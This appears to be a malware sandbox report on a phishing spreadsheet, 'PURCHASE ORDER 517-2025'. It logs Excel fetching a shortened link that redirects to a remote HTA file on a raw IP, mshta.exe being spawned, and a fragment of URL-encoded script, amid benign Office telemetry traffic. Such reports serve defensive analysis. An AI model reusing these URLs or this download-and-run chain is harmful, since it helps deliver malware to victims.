                                    Mar 26, 2025 19:36:07.968502045 CET228INData Raw: 37 33 25 36 35 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 37 25 36 39 25 36 45 25 36 34 25 36 46 25 37 37 25 32 45 25 36 33 25 36 43 25 36 46 25 37 33 25 36 35 25 30 41 25 32 30 25 32 30 25 32 30 25 32
                                    Data Ascii: 73%65%0A%20%20%20%20%20%20%20%20%77%69%6E%64%6F%77%2E%63%6C%6F%73%65%0A%20%20%20%20%3C%2F%73%63%72%69%70%74%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%3C%2F%62%6F%64%79%3E%0A%3C%2F%68%74%6D%6C%3E%0A'));//--></Script>


                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.749697147.79.86.934436532C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                    TimestampBytes transferredDirectionData
                                    2025-03-26 18:36:07 UTC209OUTGET /vJcD8F?&silk=enthusiastic HTTP/1.1
                                    Accept: */*
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                    Host: agr.my
                                    Connection: Keep-Alive
                                    2025-03-26 18:36:07 UTC463INHTTP/1.1 302 Found
                                    Content-Length: 103
                                    Content-Type: text/plain; charset=utf-8
                                    Date: Wed, 26 Mar 2025 18:36:07 GMT
                                    Location: http://172.245.123.32/xampp/kobs/kukmakingbestcrzythingsinmylife.hta?&light=royal
                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                    Vary: Accept
                                    X-Content-Type-Options: nosniff
                                    X-Dns-Prefetch-Control: off
                                    X-Download-Options: noopen
                                    X-Frame-Options: SAMEORIGIN
                                    X-Xss-Protection: 1; mode=block
                                    Connection: close
                                    2025-03-26 18:36:07 UTC103INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 34 35 2e 31 32 33 2e 33 32 2f 78 61 6d 70 70 2f 6b 6f 62 73 2f 6b 75 6b 6d 61 6b 69 6e 67 62 65 73 74 63 72 7a 79 74 68 69 6e 67 73 69 6e 6d 79 6c 69 66 65 2e 68 74 61 3f 26 6c 69 67 68 74 3d 72 6f 79 61 6c
                                    Data Ascii: Found. Redirecting to http://172.245.123.32/xampp/kobs/kukmakingbestcrzythingsinmylife.hta?&light=royal


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.74969913.107.246.414436532C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                    TimestampBytes transferredDirectionData
                                    2025-03-26 18:36:22 UTC226OUTGET /rules/excel.exe-Production-v19.bundle HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept-Encoding: gzip
                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                    Host: otelrules.svc.static.microsoft
                                    2025-03-26 18:36:22 UTC493INHTTP/1.1 200 OK
                                    Date: Wed, 26 Mar 2025 18:36:22 GMT
                                    Content-Type: text/plain
                                    Content-Length: 1114783
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Cache-Control: public
                                    Last-Modified: Mon, 24 Mar 2025 13:40:54 GMT
                                    ETag: "0x8DD6AD97FEF19EF"
                                    x-ms-request-id: c143ef55-001e-005a-3b72-9ec3d0000000
                                    x-ms-version: 2018-03-28
                                    x-azure-ref: 20250326T183622Z-17cccd5449b4tm5chC1EWRr5980000000hbg00000000ex63
                                    x-fd-int-roxy-purgeid: 0
                                    X-Cache-Info: L1_T2
                                    X-Cache: TCP_HIT
                                    Accept-Ranges: bytes
                                    2025-03-26 18:36:22 UTC15891INData Raw: 31 30 30 30 34 32 76 32 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 34 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 55 58 2e 44 65 73 6b 74 6f 70 2e 4f 66 66 69 63 65 54 68 65 6d 65 2e 41 70 70 2e 49 6e 69 74 22 20 41 54 54 3d 22 63 34 33 38 38 63 39 37 37 32 39 37 34 31 33 62 62 30 35 34 62 61 64 31 61 63 66 30 61 64 65 31 2d 63 63 35 38 65 35 33 65 2d 66 35 61 34 2d 34 66 33 37 2d 62 30 64 32 2d 39 61 38 30 37 39 65 33 34 34 32 30 2d 36 38 37 39 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 63 6d 39 79 35
                                    Data Ascii: 100042v2+<?xml version="1.0" encoding="utf-8"?><R Id="100042" V="2" DC="SM" EN="Office.UX.Desktop.OfficeTheme.App.Init" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="cm9y5
                                    2025-03-26 18:36:22 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 30 31 31 37 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 31 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 38 79 6c 6c 66 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 56 20 56 3d 22 43 6c 69 63 6b 22 20 54 3d 22 57 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32
                                    Data Ascii: /> </T></R><$!#>100117v0+<?xml version="1.0" encoding="utf-8"?><R Id="100117" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="8yllf" /> </S> <C T="W" I="0" O="false"> <V V="Click" T="W" /> </C> <C T="U32
                                    2025-03-26 18:36:22 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 37 38 31 76 31 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 37 38 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 67 6f 34 74 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 68 6c 76 79 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 49 33 32
                                    Data Ascii: </C> <T> <S T="2" /> <S T="3" /> </T></R><$!#>10781v1+<?xml version="1.0" encoding="utf-8"?><R Id="10781" V="1" DC="SM" T="Subrule" xmlns=""> <S> <UTS T="1" Id="bgo4t" /> <UTS T="2" Id="bhlvy" /> </S> <C T="I32
                                    2025-03-26 18:36:22 UTC16384INData Raw: 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 30 30 30 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                    Data Ascii: <L> <O T="GT"> <L> <S T="1" F="0" /> </L> <R> <V V="1000" T="U32" /> </R> </O> </L> <R> <O T="LE"> <
                                    2025-03-26 18:36:22 UTC16384INData Raw: 20 49 3d 22 32 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 56 69 64 65 6f 43 61 6c 6c 56 69 64 65 6f 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 36 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 33 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 53 61 53 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 34 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 4f 76 65 72 66 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54
                                    Data Ascii: I="22" O="false" N="FlyoutVideoCallVideo"> <C> <S T="26" /> </C> </C> <C T="U32" I="23" O="false" N="FlyoutSaS"> <C> <S T="27" /> </C> </C> <C T="U32" I="24" O="false" N="FlyoutOverflow"> <C> <S T
                                    2025-03-26 18:36:22 UTC16384INData Raw: 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 39 30 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 4e 44 42 2e 55 6e 6b 6e 6f 77 6e 2e 43 6f 72 72 75 70 74 69 6f 6e 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 53 3d 22 31 30 30 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 45 74 77 20 54 3d 22 31 22 20 45 3d 22 33 39 35 22 20 47 3d 22 7b 32 61 64 66 38 65 32 33 2d 30 61 66 39 2d
                                    Data Ascii: coding="utf-8"?><R Id="10907" V="0" DC="SM" EN="Office.Outlook.Desktop.NDB.Unknown.Corruption" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="100" DCa="PSU" xmlns=""> <S> <Etw T="1" E="395" G="{2adf8e23-0af9-
                                    2025-03-26 18:36:22 UTC16384INData Raw: 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 33 22 20 49 64 3d 22 62 70 66 79 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 34 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 50 68 6f 74 6f 53 69 7a 65 49 6e 42 79 74 65 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 55 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55
                                    Data Ascii: "TelemetryShutdown" /> <UTS T="3" Id="bpfy1" /> <F T="4"> <O T="GT"> <L> <S T="3" F="PhotoSizeInBytes" /> </L> <R> <V V="0" T="U64" /> </R> </O> </F> </S> <C T="U
                                    2025-03-26 18:36:22 UTC16384INData Raw: 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 65 76 65 6e 74 49 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 33 35 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 74 63 69 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20
                                    Data Ascii: <L> <S T="4" F="eventId" /> </L> <R> <V V="135" T="I32" /> </R> </O> </F> <F T="7"> <O T="EQ"> <L> <S T="5" F="tcid" /> </L> <R> <V
                                    2025-03-26 18:36:22 UTC16384INData Raw: 0d 0a 20 20 20 20 3c 46 20 54 3d 22 31 30 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 46 69 6c 65 50 72 6f 74 65 63 74 69 6f 6e 53 74 61 74 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 35 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 4f 66 54 68 72 6f 77 6e 45 78 63 65 70 74 69 6f 6e 22 3e 0d
                                    Data Ascii: <F T="10"> <O T="EQ"> <L> <S T="3" F="FileProtectionState" /> </L> <R> <V V="5" T="U32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="CountOfThrownException">
                                    2025-03-26 18:36:22 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 72 65 73 75 6c 74 73 5f 49 73 4e 75 6c 6c 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20
                                    Data Ascii: <S T="5" F="results_IsNull" /> </L> <R> <V V="false" T="B" /> </R> </O> </L> <R> <O T="EQ"> <L>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.74970113.107.246.414436532C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                    TimestampBytes transferredDirectionData
                                    2025-03-26 18:36:28 UTC214OUTGET /rules/rule120607v1s19.xml HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept-Encoding: gzip
                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                    Host: otelrules.svc.static.microsoft
                                    2025-03-26 18:36:28 UTC491INHTTP/1.1 200 OK
                                    Date: Wed, 26 Mar 2025 18:36:28 GMT
                                    Content-Type: text/xml
                                    Content-Length: 204
                                    Connection: close
                                    Cache-Control: public, max-age=604800, immutable
                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                    ETag: "0x8DC582BB6C8527A"
                                    x-ms-request-id: fe09a350-901e-0048-3adf-9cb800000000
                                    x-ms-version: 2018-03-28
                                    x-azure-ref: 20250326T183628Z-17cccd5449bn9hh6hC1EWRzvfg0000000hf0000000007kv5
                                    x-fd-int-roxy-purgeid: 0
                                    X-Cache: TCP_HIT
                                    X-Cache-Info: L1_T2
                                    Accept-Ranges: bytes
                                    2025-03-26 18:36:28 UTC204INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 37 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 45 52 3d 22 31 32 30 36 30 33 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 62 70 7a 73 22 20 41 3d 22 39 34 30 74 63 20 39 78 35 6a 73 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120607" V="1" DC="SM" T="Subrule" ER="120603" xmlns=""> <S> <UTS T="1" Id="bbpzs" A="940tc 9x5js" /> </S> <T> <S T="1" /> </T></R>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.74970013.107.246.414436532C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                    TimestampBytes transferredDirectionData
                                    2025-03-26 18:36:28 UTC214OUTGET /rules/rule120603v8s19.xml HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept-Encoding: gzip
                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                    Host: otelrules.svc.static.microsoft
                                    2025-03-26 18:36:28 UTC494INHTTP/1.1 200 OK
                                    Date: Wed, 26 Mar 2025 18:36:28 GMT
                                    Content-Type: text/xml
                                    Content-Length: 2128
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Cache-Control: public, max-age=604800, immutable
                                    Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                    ETag: "0x8DC582BA41F3C62"
                                    x-ms-request-id: 788ac460-101e-0028-1057-9e8f64000000
                                    x-ms-version: 2018-03-28
                                    x-azure-ref: 20250326T183628Z-186b855ff67rqbg6hC1NYC6cws0000000hb0000000005c54
                                    x-fd-int-roxy-purgeid: 0
                                    X-Cache: TCP_HIT
                                    Accept-Ranges: bytes
                                    2025-03-26 18:36:28 UTC2128INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 33 22 20 56 3d 22 38 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 64 64 69 74 69 6f 6e 61 6c 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 45 3d 22 66 61 6c 73 65 22 20 44 4c 3d
                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120603" V="8" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" E="false" DL=


                                    Statistics

                                    CPU Usage

                                    050100s020406080100

                                    Click to jump to process

                                    Memory Usage

                                    050100s0.0050100150MB

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    • File
                                    • Registry

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:14:35:12
                                    Start date:26/03/2025
                                    Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                    Imagebase:0x470000
                                    File size:53'161'064 bytes
                                    MD5 hash:4A871771235598812032C822E6F68F19
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false
                                    Show Windows behavior

                                    File Activities

                                    Show Windows behavior

                                    Section Activities

                                    Show Windows behavior

                                    Registry Activities

                                    Show Windows behavior

                                    COM Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Process Activities

                                    Show Windows behavior

                                    Thread Activities

                                    Show Windows behavior

                                    Memory Activities

                                    Show Windows behavior

                                    System Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Windows UI Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    General

                                    Target ID:11
                                    Start time:14:36:07
                                    Start date:26/03/2025
                                    Path:C:\Windows\SysWOW64\mshta.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\mshta.exe -Embedding
                                    Imagebase:0x9f0000
                                    File size:13'312 bytes
                                    MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Section Activities

                                    Show Windows behavior

                                    Registry Activities

                                    Show Windows behavior

                                    COM Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Thread Activities

                                    Show Windows behavior

                                    Memory Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Windows UI Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    General

                                    Target ID:13
                                    Start time:14:36:17
                                    Start date:26/03/2025
                                    Path:C:\Windows\splwow64.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\splwow64.exe 12288
                                    Imagebase:0x7ff63bf20000
                                    File size:163'840 bytes
                                    MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Section Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Process Activities

                                    Show Windows behavior

                                    Thread Activities

                                    Show Windows behavior

                                    Memory Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    General

                                    Target ID:15
                                    Start time:14:36:29
                                    Start date:26/03/2025
                                    Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PURCHASE ORDER 517-2025.xla.xlsx"
                                    Imagebase:0x470000
                                    File size:53'161'064 bytes
                                    MD5 hash:4A871771235598812032C822E6F68F19
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true
                                    Show Windows behavior

                                    File Activities

                                    Show Windows behavior

                                    Section Activities

                                    Show Windows behavior

                                    Registry Activities

                                    Show Windows behavior

                                    COM Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Process Activities

                                    Show Windows behavior

                                    Thread Activities

                                    Show Windows behavior

                                    Memory Activities

                                    Show Windows behavior

                                    System Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Windows UI Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    Disassembly

                                    Code Analysis

                                    Call Graph

                                    Hide Legend
                                    • Entrypoint
                                    • Decryption Function
                                    • Executed
                                    • Not Executed
                                    • Show Help
                                    callgraph 1 Error: Graph is empty

                                    Module: Sheet1

                                    Declaration
                                    LineContent
                                    1

                                    Attribute VB_Name = "Sheet1"

                                    2

                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                    3

                                    Attribute VB_GlobalNameSpace = False

                                    4

                                    Attribute VB_Creatable = False

                                    5

                                    Attribute VB_PredeclaredId = True

                                    6

                                    Attribute VB_Exposed = True

                                    7

                                    Attribute VB_TemplateDerived = False

                                    8

                                    Attribute VB_Customizable = True

                                    Module: Sheet2

                                    Declaration
                                    LineContent
                                    1

                                    Attribute VB_Name = "Sheet2"

                                    2

                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                    3

                                    Attribute VB_GlobalNameSpace = False

                                    4

                                    Attribute VB_Creatable = False

                                    5

                                    Attribute VB_PredeclaredId = True

                                    6

                                    Attribute VB_Exposed = True

